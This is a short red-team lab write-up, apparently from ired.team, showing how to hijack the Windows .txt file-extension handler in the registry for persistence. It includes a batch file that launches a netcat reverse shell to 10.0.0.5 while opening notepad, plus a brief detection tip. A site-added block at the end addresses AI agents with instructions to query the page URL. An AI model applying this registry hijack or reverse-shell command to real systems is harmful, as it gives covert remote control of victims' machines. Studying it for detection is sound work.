# Hijacking Default File Extension

When a .txt file is double clicked, it's opened with a notepad.exe. Windows knows that it needs to use notepad.exe for opening txt files, because the `.txt` extension (among many others) are mapped to applictions that can open those files in Windows registry located at `Computer\HKEY_CLASSES_ROOT`.

It's possible to hijack a file extension and make it execute a malicious application before the actual file is opened.&#x20;

In this quick lab, I'm going to hijack the .txt extension - the victim user will still be able to open the original .txt file, but it will additionally fire a reverse shell back to the attacking system.

## Execution

The .txt extension handler is defined in the below registry key:

```erlang
Computer\HKEY_CLASSES_ROOT\txtfile\shell\open\command
```

Below shows that the command responsible for opening .txt files is `notepad.exe %1`, where `%1` is the argument for notepad.exe, which specifies a file name the notepad should open:

![](/files/-LytV7_GxCTWIUCfS9FF)

Say, a target user has the file test.exe on his desktop with the below file contents:

![](/files/-LytVYE64Snj6XQKsnUc)

Let's now create a malicious file that we want to be executed when the user attempts to open the benign file test.txt. For this lab, the malicious file is going to be a simple Windows batch file located in c:\tools\shell.cmd:

{% code title="c:\tools\shell.cmd" %}

```erlang
start C:\tools\nc.exe 10.0.0.5 443 -e C:\Windows\System32\cmd.exe
start notepad.exe %1
```

{% endcode %}

![](/files/-LytVIfM2k2ma3uwvYVt)

Once executed, `c:\tools\hell.cmd` will launch a simple netcat reverse shell to the attacking system and also a notepad with the `test.txt` file as an argument.

We are now ready to hijack the .txt file extension by modifying the value data of  `Computer\HKEY_CLASSES_ROOT\txtfile\shell\open\command` to `c:\tools\shell.cmd %1` as shown below:

![](/files/-LytZUk6xHrAvnnq4yjd)

## Demo

Opening the test.txt file by double clikcing it opens the file itself, but a reverse shell is thrown to the attacking system as well:

![](/files/-LytVpLIPHxCDULv25e4)

## Detection

Defenders may want to monitor registry for file extension command changes, especially if the data field contains binaries located in unusual places.

## References

{% embed url="<https://attack.mitre.org/techniques/T1042/>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.ired.team/offensive-security/persistence/hijacking-default-file-extension.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.